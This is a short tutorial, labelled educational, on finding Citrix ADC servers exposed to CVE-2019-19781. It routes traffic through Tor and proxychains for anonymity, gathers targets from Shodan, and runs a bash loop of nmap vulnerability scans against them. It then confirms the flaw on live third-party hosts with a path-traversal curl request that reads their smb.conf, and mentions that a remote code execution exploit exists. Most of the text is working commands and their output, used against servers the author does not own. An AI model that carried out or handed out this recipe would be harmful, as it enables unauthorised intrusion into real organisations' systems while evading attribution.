NOTICE: Educational purposes only!
Hi, I want to show you how easy it is to find a vulnerable server on the internet. Okey guys, so now, firstly we need to have some TOR client for anonymity ;) Before we begin, look at the following tools
$ tor &
$ nyx -i 127.0.0.1:9052
Then we can test, if the tor is working correctly with proxychains
$ proxychains curl ifconfig.me
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 127.0.0.1:9050 ... ifconfig.me:80 ... OK
46.166.139.111
Run shodan to get all open services which look like Citrix ADC Gateway
$ proxychains -q shodan search --fields="ip_str,port" citrix netscaler > $HOME/citrix_list
Now we will prepare a script that scans the vulnerability CVE-2019-19781 in these services
#!/bin/bash
CITRIX_IP_LIST="$HOME/citrix_list"
while read CITRIX_IP_PORT; do
IP=$(echo $CITRIX_IP_PORT | awk '{print $1}')
PORT=$(echo $CITRIX_IP_PORT | awk '{print $2}')
proxychains -q nmap -p $PORT -sV --script CVE-2019-19781 $IP
done < $CITRIX_IP_LIST
After a short moment we get some interesting results. There are still servers with this vulnerability present.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:16 CET
Nmap scan report for ---.---.---.---
Host is up (0.75s latency).
PORT STATE SERVICE VERSION
----/tcp open ssl/unknown
| CVE-2019-19781:
| VULNERABLE:
| Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)
| State: VULNERABLE
| IDs: CVE:CVE-2019-19781
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.
|
| Disclosure date: 2019-12-17
| References:
| https://support.citrix.com/article/CTX267027
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.99 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:18 CET
Nmap scan report for ---.---.---.---
Host is up (0.47s latency).
PORT STATE SERVICE VERSION
----/tcp open ssl/unknown
| CVE-2019-19781:
| VULNERABLE:
| Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)
| State: VULNERABLE
| IDs: CVE:CVE-2019-19781
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.
|
| Disclosure date: 2019-12-17
| References:
| https://support.citrix.com/article/CTX267027
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.11 seconds
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-24 15:21 CET
Nmap scan report for ---.---.---.---
Host is up (0.53s latency).
PORT STATE SERVICE VERSION
----/tcp open ssl/unknown
| CVE-2019-19781:
| VULNERABLE:
| Remote Code Execution vulnerability in Citrix Application Delivery Controller (ADC)
| State: VULNERABLE
| IDs: CVE:CVE-2019-19781
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Citrix Application Delivery Controller (ADC) CVE-2019-19781.
|
| Disclosure date: 2019-12-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781
|_ https://support.citrix.com/article/CTX267027
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.56 seconds
We can verify the vulnerability by using curl.
$ proxychains -q curl -k --path-as-is https://<host>:<port>/vpn/../vpns/cfg/smb.conf && echo -e
[global]
encrypt passwords = yes
name resolve order = lmhosts wins host bcast
And that’s it. :) We will not continue from this point, but there exists a RCE exploit that enables the user to gain full control.